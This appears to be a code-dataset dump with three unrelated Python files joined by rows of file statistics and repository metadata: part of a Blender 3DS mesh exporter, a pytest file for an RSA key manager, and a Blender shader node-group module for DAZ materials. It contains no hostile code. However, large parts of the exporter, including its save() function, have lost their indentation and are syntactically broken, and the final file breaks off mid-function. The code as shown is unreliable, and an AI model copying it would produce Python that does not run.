    if mesh.tessface_uv_textures:
        # Gather materials used in this mesh - mat/image pairs
        unique_mats = {}
        for i, tri in enumerate(tri_list):

            face_list.add(_3ds_face(tri.vertex_index))

            if materials:
                mat = materials[tri.mat]
                if mat:
                    mat = mat.name

            img = tri.image

            try:
                context_mat_face_array = unique_mats[mat, img][1]
            except:
                name_str = mat if mat else "None"
                if img:
                    name_str += img

                context_mat_face_array = _3ds_array()
                unique_mats[mat, img] = _3ds_string(sane_name(name_str)), context_mat_face_array

            context_mat_face_array.add(_3ds_ushort(i))
            # obj_material_faces[tri.mat].add(_3ds_ushort(i))

        face_chunk.add_variable("faces", face_list)
        for mat_name, mat_faces in unique_mats.values():
            obj_material_chunk = _3ds_chunk(OBJECT_MATERIAL)
            obj_material_chunk.add_variable("name", mat_name)
            obj_material_chunk.add_variable("face_list", mat_faces)
            face_chunk.add_subchunk(obj_material_chunk)

    else:
        obj_material_faces = []
        obj_material_names = []
        for m in materials:
            if m:
                obj_material_names.append(_3ds_string(sane_name(m.name)))
                obj_material_faces.append(_3ds_array())
        n_materials = len(obj_material_names)

        for i, tri in enumerate(tri_list):
            face_list.add(_3ds_face(tri.vertex_index))
            if (tri.mat < n_materials):
                obj_material_faces[tri.mat].add(_3ds_ushort(i))

        face_chunk.add_variable("faces", face_list)
        for i in range(n_materials):
            obj_material_chunk = _3ds_chunk(OBJECT_MATERIAL)
            obj_material_chunk.add_variable("name", obj_material_names[i])
            obj_material_chunk.add_variable("face_list", obj_material_faces[i])
            face_chunk.add_subchunk(obj_material_chunk)

    return face_chunk

def make_vert_chunk(vert_array):
    """Make a vertex chunk out of an array of vertices."""
    vert_chunk = _3ds_chunk(OBJECT_VERTICES)
    vert_chunk.add_variable("vertices", vert_array)
    return vert_chunk


def make_uv_chunk(uv_array):
    """Make a UV chunk out of an array of UVs."""
    uv_chunk = _3ds_chunk(OBJECT_UV)
    uv_chunk.add_variable("uv coords", uv_array)
    return uv_chunk


def make_matrix_4x3_chunk(matrix):
    matrix_chunk = _3ds_chunk(OBJECT_TRANS_MATRIX)
    for vec in matrix.col:
        for f in vec[:3]:
            matrix_chunk.add_variable("matrix_f", _3ds_float(f))
    return matrix_chunk


def make_mesh_chunk(mesh, matrix, materialDict):
    """Make a chunk out of a Blender mesh."""

    # Extract the triangles from the mesh:
    tri_list = extract_triangles(mesh)

    if mesh.tessface_uv_textures:
        # Remove the face UVs and convert it to vertex UV:
        vert_array, uv_array, tri_list = remove_face_uv(mesh.vertices, tri_list)
    else:
        # Add the vertices to the vertex array:
        vert_array = _3ds_array()
        for vert in mesh.vertices:
            vert_array.add(_3ds_point_3d(vert.co))
        # no UV at all:
        uv_array = None

    # create the chunk:
    mesh_chunk = _3ds_chunk(OBJECT_MESH)

    # add vertex chunk:
    mesh_chunk.add_subchunk(make_vert_chunk(vert_array))

    # add faces chunk:
    mesh_chunk.add_subchunk(make_faces_chunk(tri_list, mesh, materialDict))

    # if available, add uv chunk:
    if uv_array:
        mesh_chunk.add_subchunk(make_uv_chunk(uv_array))

    mesh_chunk.add_subchunk(make_matrix_4x3_chunk(matrix))

    return mesh_chunk
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
def make_kfdata(start=0, stop=0, curtime=0):
"""Make the basic keyframe data chunk"""
kfdata = _3ds_chunk(KFDATA)
kfhdr = _3ds_chunk(KFDATA_KFHDR)
kfhdr.add_variable("revision", _3ds_ushort(0))
# Not really sure what filename is used for, but it seems it is usually used
# to identify the program that generated the .3ds:
kfhdr.add_variable("filename", _3ds_string("Blender"))
kfhdr.add_variable("animlen", _3ds_uint(stop-start))
kfseg = _3ds_chunk(KFDATA_KFSEG)
kfseg.add_variable("start", _3ds_uint(start))
kfseg.add_variable("stop", _3ds_uint(stop))
kfcurtime = _3ds_chunk(KFDATA_KFCURTIME)
kfcurtime.add_variable("curtime", _3ds_uint(curtime))
kfdata.add_subchunk(kfhdr)
kfdata.add_subchunk(kfseg)
kfdata.add_subchunk(kfcurtime)
return kfdata
def make_track_chunk(ID, obj):
"""Make a chunk for track data.
Depending on the ID, this will construct a position, rotation or scale track."""
track_chunk = _3ds_chunk(ID)
track_chunk.add_variable("track_flags", _3ds_ushort())
track_chunk.add_variable("unknown", _3ds_uint())
track_chunk.add_variable("unknown", _3ds_uint())
track_chunk.add_variable("nkeys", _3ds_uint(1))
# Next section should be repeated for every keyframe, but for now, animation is not actually supported.
track_chunk.add_variable("tcb_frame", _3ds_uint(0))
track_chunk.add_variable("tcb_flags", _3ds_ushort())
if obj.type=='Empty':
if ID==POS_TRACK_TAG:
# position vector:
track_chunk.add_variable("position", _3ds_point_3d(obj.getLocation()))
elif ID==ROT_TRACK_TAG:
# rotation (quaternion, angle first, followed by axis):
q = obj.getEuler().to_quaternion() # XXX, todo!
track_chunk.add_variable("rotation", _3ds_point_4d((q.angle, q.axis[0], q.axis[1], q.axis[2])))
elif ID==SCL_TRACK_TAG:
# scale vector:
track_chunk.add_variable("scale", _3ds_point_3d(obj.getSize()))
else:
# meshes have their transformations applied before
# exporting, so write identity transforms here:
if ID==POS_TRACK_TAG:
# position vector:
track_chunk.add_variable("position", _3ds_point_3d((0.0,0.0,0.0)))
elif ID==ROT_TRACK_TAG:
# rotation (quaternion, angle first, followed by axis):
track_chunk.add_variable("rotation", _3ds_point_4d((0.0, 1.0, 0.0, 0.0)))
elif ID==SCL_TRACK_TAG:
# scale vector:
track_chunk.add_variable("scale", _3ds_point_3d((1.0, 1.0, 1.0)))
return track_chunk
def make_kf_obj_node(obj, name_to_id):
"""Make a node chunk for a Blender object.
    Takes the Blender object as a parameter. Object ids are taken from the dictionary name_to_id.
Blender Empty objects are converted to dummy nodes."""
name = obj.name
# main object node chunk:
kf_obj_node = _3ds_chunk(KFDATA_OBJECT_NODE_TAG)
# chunk for the object id:
obj_id_chunk = _3ds_chunk(OBJECT_NODE_ID)
# object id is from the name_to_id dictionary:
obj_id_chunk.add_variable("node_id", _3ds_ushort(name_to_id[name]))
# object node header:
obj_node_header_chunk = _3ds_chunk(OBJECT_NODE_HDR)
# object name:
if obj.type == 'Empty':
# Empties are called "$$$DUMMY" and use the OBJECT_INSTANCE_NAME chunk
# for their name (see below):
obj_node_header_chunk.add_variable("name", _3ds_string("$$$DUMMY"))
else:
# Add the name:
obj_node_header_chunk.add_variable("name", _3ds_string(sane_name(name)))
# Add Flag variables (not sure what they do):
obj_node_header_chunk.add_variable("flags1", _3ds_ushort(0))
obj_node_header_chunk.add_variable("flags2", _3ds_ushort(0))
# Check parent-child relationships:
parent = obj.parent
if (parent is None) or (parent.name not in name_to_id):
    # If there is no parent, or the parent's name is not in the name_to_id dictionary,
# parent id becomes -1:
obj_node_header_chunk.add_variable("parent", _3ds_ushort(-1))
else:
# Get the parent's id from the name_to_id dictionary:
obj_node_header_chunk.add_variable("parent", _3ds_ushort(name_to_id[parent.name]))
# Add pivot chunk:
obj_pivot_chunk = _3ds_chunk(OBJECT_PIVOT)
obj_pivot_chunk.add_variable("pivot", _3ds_point_3d(obj.getLocation()))
kf_obj_node.add_subchunk(obj_pivot_chunk)
# add subchunks for object id and node header:
kf_obj_node.add_subchunk(obj_id_chunk)
kf_obj_node.add_subchunk(obj_node_header_chunk)
# Empty objects need to have an extra chunk for the instance name:
if obj.type == 'Empty':
obj_instance_name_chunk = _3ds_chunk(OBJECT_INSTANCE_NAME)
obj_instance_name_chunk.add_variable("name", _3ds_string(sane_name(name)))
kf_obj_node.add_subchunk(obj_instance_name_chunk)
# Add track chunks for position, rotation and scale:
kf_obj_node.add_subchunk(make_track_chunk(POS_TRACK_TAG, obj))
kf_obj_node.add_subchunk(make_track_chunk(ROT_TRACK_TAG, obj))
kf_obj_node.add_subchunk(make_track_chunk(SCL_TRACK_TAG, obj))
return kf_obj_node
'''
def save(operator,
context, filepath="",
use_selection=True,
global_matrix=None,
):
    """Save the Blender scene to a 3ds file."""
    import bpy
    import mathutils
    import time
    from bpy_extras.io_utils import create_derived_objects, free_derived_objects
# Time the export
time1 = time.clock()
#Blender.Window.WaitCursor(1)
if global_matrix is None:
global_matrix = mathutils.Matrix()
if bpy.ops.object.mode_set.poll():
bpy.ops.object.mode_set(mode='OBJECT')
# Initialize the main chunk (primary):
primary = _3ds_chunk(PRIMARY)
# Add version chunk:
version_chunk = _3ds_chunk(VERSION)
version_chunk.add_variable("version", _3ds_uint(3))
primary.add_subchunk(version_chunk)
# init main object info chunk:
object_info = _3ds_chunk(OBJECTINFO)
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
# init main key frame data chunk:
kfdata = make_kfdata()
'''
# Make a list of all materials used in the selected meshes (use a dictionary,
# each material is added once):
materialDict = {}
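    # (Keys are (material_name, image_name) tuples -- see the setdefault()
    # calls below -- so each unique material/texture pairing produces
    # exactly one material chunk.)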
mesh_objects = []
scene = context.scene
if use_selection:
objects = (ob for ob in scene.objects if ob.is_visible(scene) and ob.select)
else:
objects = (ob for ob in scene.objects if ob.is_visible(scene))
for ob in objects:
# get derived objects
free, derived = create_derived_objects(scene, ob)
if derived is None:
continue
for ob_derived, mat in derived:
if ob.type not in {'MESH', 'CURVE', 'SURFACE', 'FONT', 'META'}:
continue
try:
data = ob_derived.to_mesh(scene, True, 'PREVIEW')
except:
data = None
if data:
matrix = global_matrix * mat
data.transform(matrix)
mesh_objects.append((ob_derived, data, matrix))
mat_ls = data.materials
mat_ls_len = len(mat_ls)
# get material/image tuples.
if data.tessface_uv_textures:
if not mat_ls:
mat = mat_name = None
for f, uf in zip(data.tessfaces, data.tessface_uv_textures.active.data):
if mat_ls:
mat_index = f.material_index
if mat_index >= mat_ls_len:
                                # tessfaces use material_index (f.mat was the old 2.4x API)
                                mat_index = f.material_index = 0
mat = mat_ls[mat_index]
mat_name = None if mat is None else mat.name
                        # else they are already set to None
img = uf.image
img_name = None if img is None else img.name
materialDict.setdefault((mat_name, img_name), (mat, img))
else:
for mat in mat_ls:
if mat: # material may be None so check its not.
materialDict.setdefault((mat.name, None), (mat, None))
# Why 0 Why!
for f in data.tessfaces:
if f.material_index >= mat_ls_len:
f.material_index = 0
if free:
free_derived_objects(ob)
# Make material chunks for all materials used in the meshes:
for mat_and_image in materialDict.values():
object_info.add_subchunk(make_material_chunk(mat_and_image[0], mat_and_image[1]))
# Give all objects a unique ID and build a dictionary from object name to object id:
"""
name_to_id = {}
for ob, data in mesh_objects:
name_to_id[ob.name]= len(name_to_id)
#for ob in empty_objects:
# name_to_id[ob.name]= len(name_to_id)
"""
# Create object chunks for all meshes:
i = 0
for ob, blender_mesh, matrix in mesh_objects:
# create a new object chunk
object_chunk = _3ds_chunk(OBJECT)
# set the object name
object_chunk.add_variable("name", _3ds_string(sane_name(ob.name)))
# make a mesh chunk out of the mesh:
object_chunk.add_subchunk(make_mesh_chunk(blender_mesh, matrix, materialDict))
        # Ensure the mesh has no oversized arrays and skip ones that do,
        # otherwise we can't write them since the array sizes won't fit
        # into a USHORT.
if object_chunk.validate():
object_info.add_subchunk(object_chunk)
else:
            operator.report({'WARNING'}, "Object %r can't be written into a 3DS file" % ob.name)
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
# make a kf object node for the object:
kfdata.add_subchunk(make_kf_obj_node(ob, name_to_id))
'''
if not blender_mesh.users:
bpy.data.meshes.remove(blender_mesh)
#blender_mesh.vertices = None
        i += 1
# Create chunks for all empties:
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
for ob in empty_objects:
# Empties only require a kf object node:
kfdata.add_subchunk(make_kf_obj_node(ob, name_to_id))
pass
'''
# Add main object info chunk to primary chunk:
primary.add_subchunk(object_info)
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
# Add main keyframe data chunk to primary chunk:
primary.add_subchunk(kfdata)
'''
# At this point, the chunk hierarchy is completely built.
# Check the size:
primary.get_size()
# Open the file for writing:
file = open(filepath, 'wb')
# Recursively write the chunks to file:
primary.write(file)
# Close the file:
file.close()
# Clear name mapping vars, could make locals too
del name_unique[:]
name_mapping.clear()
# Debugging only: report the exporting time:
#Blender.Window.WaitCursor(0)
print("3ds export time: %.2f" % (time.clock() - time1))
# Debugging only: dump the chunk hierarchy:
#primary.dump()
return {'FINISHED'}
| 33.066667 | 119 | 0.637123 | 5,456 | 38,688 | 4.283908 | 0.135814 | 0.018141 | 0.021906 | 0.002225 | 0.313267 | 0.261498 | 0.212467 | 0.16887 | 0.13276 | 0.099816 | 0 | 0.020327 | 0.262459 | 38,688 | 1,169 | 120 | 33.094953 | 0.798801 | 0.220947 | 0 | 0.235507 | 0 | 0 | 0.027229 | 0 | 0 | 0 | 0.011523 | 0.000855 | 0.001812 | 1 | 0.117754 | false | 0 | 0.01087 | 0.036232 | 0.246377 | 0.007246 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f65013ec486ea2f0ba3e9a87712daece63dea9 | 1,206 | py | Python | tests/test_crypto/test_rsa_manager.py | Zapix/mtpylon | b268a4e2d1bc641cace1962ea68de73c1156e44c | [
"MIT"
] | 9 | 2021-11-10T08:53:51.000Z | 2021-12-15T12:03:44.000Z | tests/test_crypto/test_rsa_manager.py | Zapix/mtpylon | b268a4e2d1bc641cace1962ea68de73c1156e44c | [
"MIT"
] | 123 | 2020-10-22T07:08:20.000Z | 2021-09-29T15:26:22.000Z | tests/test_crypto/test_rsa_manager.py | Zapix/mtpylon | b268a4e2d1bc641cace1962ea68de73c1156e44c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import pytest
from rsa import PublicKey, PrivateKey # type: ignore
from tests.simple_manager import manager as rsa_manager, key_data_list
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.fingerprint
)
def test_contains_fingerprint(key_data):
assert key_data.fingerprint in rsa_manager
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.fingerprint
)
def test_get_keypair(key_data):
public = PublicKey.load_pkcs1(key_data.public_str)
private = PrivateKey.load_pkcs1(key_data.private_str)
key_pair = rsa_manager[key_data.fingerprint]
assert key_pair.public == public
assert key_pair.private == private
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.public_str
)
def test_check_public_str(key_data):
public = PublicKey.load_pkcs1(key_data.public_str)
public_bytes = public.save_pkcs1()
assert public_bytes in rsa_manager.public_key_list
@pytest.mark.parametrize(
'key_data',
key_data_list,
ids=lambda x: x.fingerprint
)
def test_check_fingerprint_in_list(key_data):
assert key_data.fingerprint in rsa_manager.fingerprint_list
| 24.612245 | 70 | 0.752073 | 175 | 1,206 | 4.857143 | 0.228571 | 0.156471 | 0.064706 | 0.112941 | 0.52 | 0.52 | 0.52 | 0.52 | 0.52 | 0.418824 | 0 | 0.004931 | 0.159204 | 1,206 | 48 | 71 | 25.125 | 0.833333 | 0.028192 | 0 | 0.459459 | 0 | 0 | 0.027374 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 1 | 0.108108 | false | 0 | 0.081081 | 0 | 0.189189 | 0.216216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f76915caec7652c58b9705a01e1653a9685be1 | 33,157 | py | Python | cgroup.py | ModdingClass/import_daz-v1.5.0-20200918_custom | e782cbb120156e67409029a96c3e692c07fd5133 | [
"BSD-2-Clause"
] | null | null | null | cgroup.py | ModdingClass/import_daz-v1.5.0-20200918_custom | e782cbb120156e67409029a96c3e692c07fd5133 | [
"BSD-2-Clause"
] | null | null | null | cgroup.py | ModdingClass/import_daz-v1.5.0-20200918_custom | e782cbb120156e67409029a96c3e692c07fd5133 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2016-2020, Thomas Larsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import bpy
from .cycles import CyclesTree
from .pbr import PbrTree
from .material import WHITE
# ---------------------------------------------------------------------
# CyclesGroup
# ---------------------------------------------------------------------
class MaterialGroup:
def __init__(self, node, name, parent, ncols):
self.group = bpy.data.node_groups.new(name, 'ShaderNodeTree')
node.node_tree = self.group
self.nodes = self.group.nodes
self.links = self.group.links
self.inputs = self.addNode("NodeGroupInput", 0)
self.outputs = self.addNode("NodeGroupOutput", ncols)
self.parent = parent
self.ncols = ncols
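    # (Added note) The integer column passed to addNode() appears to be a
    # horizontal layout slot: the group's inputs sit in column 0 and its
    # outputs in column ncols, with intermediate nodes placed in between.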
class CyclesGroup(MaterialGroup, CyclesTree):
def __init__(self, node, name, parent, ncols):
CyclesTree.__init__(self, parent.material)
MaterialGroup.__init__(self, node, name, parent, ncols)
def __repr__(self):
return ("<NodeGroup %s>" % self.group)
# ---------------------------------------------------------------------
# Shell Group
# ---------------------------------------------------------------------
class ShellGroup(MaterialGroup):
def __init__(self, node, name, parent):
MaterialGroup.__init__(self, node, name, parent, 8)
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.inputs.new("NodeSocketVector", "UV")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, context, shell):
shell.rna = self.parent.material.rna
self.material = shell
self.texco = self.inputs.outputs["UV"]
self.buildLayer(context)
alpha,tex = self.getColorTex("getChannelCutoutOpacity", "NONE", 1.0)
self.addOutput(alpha, tex, self.getCyclesSocket(), "Cycles")
self.addOutput(alpha, tex, self.getEeveeSocket(), "Eevee")
def addOutput(self, alpha, tex, socket, slot):
mix = self.addNode("ShaderNodeMixShader", 7)
mix.inputs[0].default_value = alpha
if tex:
self.links.new(tex.outputs[0], mix.inputs[0])
self.links.new(self.inputs.outputs[slot], mix.inputs[1])
self.links.new(socket, mix.inputs[2])
self.links.new(mix.outputs[0], self.outputs.inputs[slot])
class ShellCyclesGroup(ShellGroup, CyclesTree):
def __init__(self, node, name, parent):
CyclesTree.__init__(self, parent.material)
ShellGroup.__init__(self, node, name, parent)
class ShellPbrGroup(ShellGroup, PbrTree):
def __init__(self, node, name, parent):
PbrTree.__init__(self, parent.material)
ShellGroup.__init__(self, node, name, parent)
# ---------------------------------------------------------------------
# Fresnel Group
# ---------------------------------------------------------------------
class FresnelGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketFloat", "IOR")
self.group.inputs.new("NodeSocketFloat", "Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
self.group.outputs.new("NodeSocketFloat", "Fac")
def addNodes(self, args=None):
geo = self.addNode("ShaderNodeNewGeometry", 1)
bump = self.addNode("ShaderNodeBump", 1)
self.links.new(self.inputs.outputs["Normal"], bump.inputs["Normal"])
bump.inputs["Strength"].default_value = 0
mix1 = self.addNode("ShaderNodeMixRGB", 2)
self.links.new(geo.outputs["Backfacing"], mix1.inputs["Fac"])
self.links.new(self.inputs.outputs["IOR"], mix1.inputs[1])
mix1.inputs[2].default_value[0:3] = WHITE
mix2 = self.addNode("ShaderNodeMixRGB", 2)
self.links.new(self.inputs.outputs["Roughness"], mix2.inputs["Fac"])
self.links.new(bump.outputs[0], mix2.inputs[1])
self.links.new(geo.outputs["Incoming"], mix2.inputs[2])
fresnel = self.addNode("ShaderNodeFresnel", 3)
self.links.new(mix1.outputs[0], fresnel.inputs["IOR"])
self.links.new(mix2.outputs[0], fresnel.inputs["Normal"])
self.links.new(fresnel.outputs["Fac"], self.outputs.inputs["Fac"])
# ---------------------------------------------------------------------
# Mix Group. Mixes Cycles and Eevee
# ---------------------------------------------------------------------
class MixGroup(CyclesGroup):
def __init__(self, node, name, parent, ncols):
CyclesGroup.__init__(self, node, name, parent, ncols)
self.group.inputs.new("NodeSocketFloat", "Fac")
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
self.mix1 = self.addNode("ShaderNodeMixShader", self.ncols-1)
self.mix2 = self.addNode("ShaderNodeMixShader", self.ncols-1)
self.links.new(self.inputs.outputs["Fac"], self.mix1.inputs[0])
self.links.new(self.inputs.outputs["Fac"], self.mix2.inputs[0])
self.links.new(self.inputs.outputs["Cycles"], self.mix1.inputs[1])
self.links.new(self.inputs.outputs["Eevee"], self.mix2.inputs[1])
self.links.new(self.mix1.outputs[0], self.outputs.inputs["Cycles"])
self.links.new(self.mix2.outputs[0], self.outputs.inputs["Eevee"])
# ---------------------------------------------------------------------
# Add Group. Adds to Cycles and Eevee
# ---------------------------------------------------------------------
class AddGroup(CyclesGroup):
def __init__(self, node, name, parent, ncols):
CyclesGroup.__init__(self, node, name, parent, ncols)
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
self.add1 = self.addNode("ShaderNodeAddShader", 2)
self.add2 = self.addNode("ShaderNodeAddShader", 2)
self.links.new(self.inputs.outputs["Cycles"], self.add1.inputs[0])
self.links.new(self.inputs.outputs["Eevee"], self.add2.inputs[0])
self.links.new(self.add1.outputs[0], self.outputs.inputs["Cycles"])
self.links.new(self.add2.outputs[0], self.outputs.inputs["Eevee"])
# ---------------------------------------------------------------------
# Emission Group
# ---------------------------------------------------------------------
class EmissionGroup(AddGroup):
def __init__(self, node, name, parent):
AddGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Strength")
def addNodes(self, args=None):
AddGroup.addNodes(self, args)
node = self.addNode("ShaderNodeEmission", 1)
self.links.new(self.inputs.outputs["Color"], node.inputs["Color"])
self.links.new(self.inputs.outputs["Strength"], node.inputs["Strength"])
self.links.new(node.outputs[0], self.add1.inputs[1])
self.links.new(node.outputs[0], self.add2.inputs[1])
class OneSidedGroup(CyclesGroup):
def __init__(self, node, name, parent):
CyclesGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketShader", "Cycles")
self.group.inputs.new("NodeSocketShader", "Eevee")
self.group.outputs.new("NodeSocketShader", "Cycles")
self.group.outputs.new("NodeSocketShader", "Eevee")
def addNodes(self, args=None):
geo = self.addNode("ShaderNodeNewGeometry", 1)
trans = self.addNode("ShaderNodeBsdfTransparent", 1)
mix1 = self.addNode("ShaderNodeMixShader", 2)
mix2 = self.addNode("ShaderNodeMixShader", 2)
self.links.new(geo.outputs["Backfacing"], mix1.inputs[0])
self.links.new(geo.outputs["Backfacing"], mix2.inputs[0])
self.links.new(self.inputs.outputs["Cycles"], mix1.inputs[1])
self.links.new(self.inputs.outputs["Eevee"], mix2.inputs[1])
self.links.new(trans.outputs[0], mix1.inputs[2])
self.links.new(trans.outputs[0], mix2.inputs[2])
self.links.new(mix1.outputs[0], self.outputs.inputs["Cycles"])
self.links.new(mix1.outputs[0], self.outputs.inputs["Eevee"])
# ---------------------------------------------------------------------
# Diffuse Group
# ---------------------------------------------------------------------
class DiffuseGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
diffuse = self.addNode("ShaderNodeBsdfDiffuse", 1)
self.links.new(self.inputs.outputs["Color"], diffuse.inputs["Color"])
self.links.new(self.inputs.outputs["Roughness"], diffuse.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], diffuse.inputs["Normal"])
self.links.new(diffuse.outputs[0], self.mix1.inputs[2])
self.links.new(diffuse.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Glossy Group
# ---------------------------------------------------------------------
class GlossyGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
glossy = self.addNode("ShaderNodeBsdfGlossy", 1)
self.links.new(self.inputs.outputs["Color"], glossy.inputs["Color"])
self.links.new(self.inputs.outputs["Roughness"], glossy.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], glossy.inputs["Normal"])
self.links.new(glossy.outputs[0], self.mix1.inputs[2])
self.links.new(glossy.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Refraction Group
# ---------------------------------------------------------------------
class RefractionGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 4)
self.group.inputs.new("NodeSocketColor", "Refraction Color")
self.group.inputs.new("NodeSocketFloat", "Refraction Roughness")
self.group.inputs.new("NodeSocketFloat", "Refraction IOR")
self.group.inputs.new("NodeSocketFloat", "Fresnel IOR")
self.group.inputs.new("NodeSocketColor", "Glossy Color")
self.group.inputs.new("NodeSocketFloat", "Glossy Roughness")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
fresnel = self.addGroup(FresnelGroup, "DAZ Fresnel", 1)
refr = self.addNode("ShaderNodeBsdfRefraction", 1)
glossy = self.addNode("ShaderNodeBsdfGlossy", 1)
self.links.new(self.inputs.outputs["Refraction Color"], refr.inputs["Color"])
self.links.new(self.inputs.outputs["Refraction Roughness"], refr.inputs["Roughness"])
self.links.new(self.inputs.outputs["Refraction IOR"], refr.inputs["IOR"])
self.links.new(self.inputs.outputs["Normal"], refr.inputs["Normal"])
self.links.new(self.inputs.outputs["Glossy Color"], glossy.inputs["Color"])
self.links.new(self.inputs.outputs["Glossy Roughness"], glossy.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], glossy.inputs["Normal"])
self.links.new(self.inputs.outputs["Fresnel IOR"], fresnel.inputs["IOR"])
self.links.new(self.inputs.outputs["Glossy Roughness"], fresnel.inputs["Roughness"])
self.links.new(self.inputs.outputs["Normal"], fresnel.inputs["Normal"])
mix = self.addNode("ShaderNodeMixShader", 2)
self.links.new(fresnel.outputs[0], mix.inputs[0])
self.links.new(refr.outputs[0], mix.inputs[1])
self.links.new(glossy.outputs[0], mix.inputs[2])
self.links.new(mix.outputs[0], self.mix1.inputs[2])
self.links.new(mix.outputs[0], self.mix2.inputs[2])
# ---------------------------------------------------------------------
# Transparent Group
# ---------------------------------------------------------------------
class TransparentGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
trans = self.addNode("ShaderNodeBsdfTransparent", 1)
self.links.new(self.inputs.outputs["Color"], trans.inputs["Color"])
        # Flip the slots: the transparent shader goes into input 1 and the
        # incoming shaders into input 2, so that Fac acts as opacity.
self.links.new(self.inputs.outputs["Cycles"], self.mix1.inputs[2])
self.links.new(self.inputs.outputs["Eevee"], self.mix2.inputs[2])
self.links.new(trans.outputs[0], self.mix1.inputs[1])
self.links.new(trans.outputs[0], self.mix2.inputs[1])
# ---------------------------------------------------------------------
# Translucent Group
# ---------------------------------------------------------------------
class TranslucentGroup(MixGroup):
def __init__(self, node, name, parent):
MixGroup.__init__(self, node, name, parent, 3)
self.group.inputs.new("NodeSocketColor", "Color")
self.group.inputs.new("NodeSocketFloat", "Scale")
self.group.inputs.new("NodeSocketVector", "Radius")
self.group.inputs.new("NodeSocketVector", "Normal")
def addNodes(self, args=None):
MixGroup.addNodes(self, args)
trans = self.addNode("ShaderNodeBsdfTranslucent", 1)
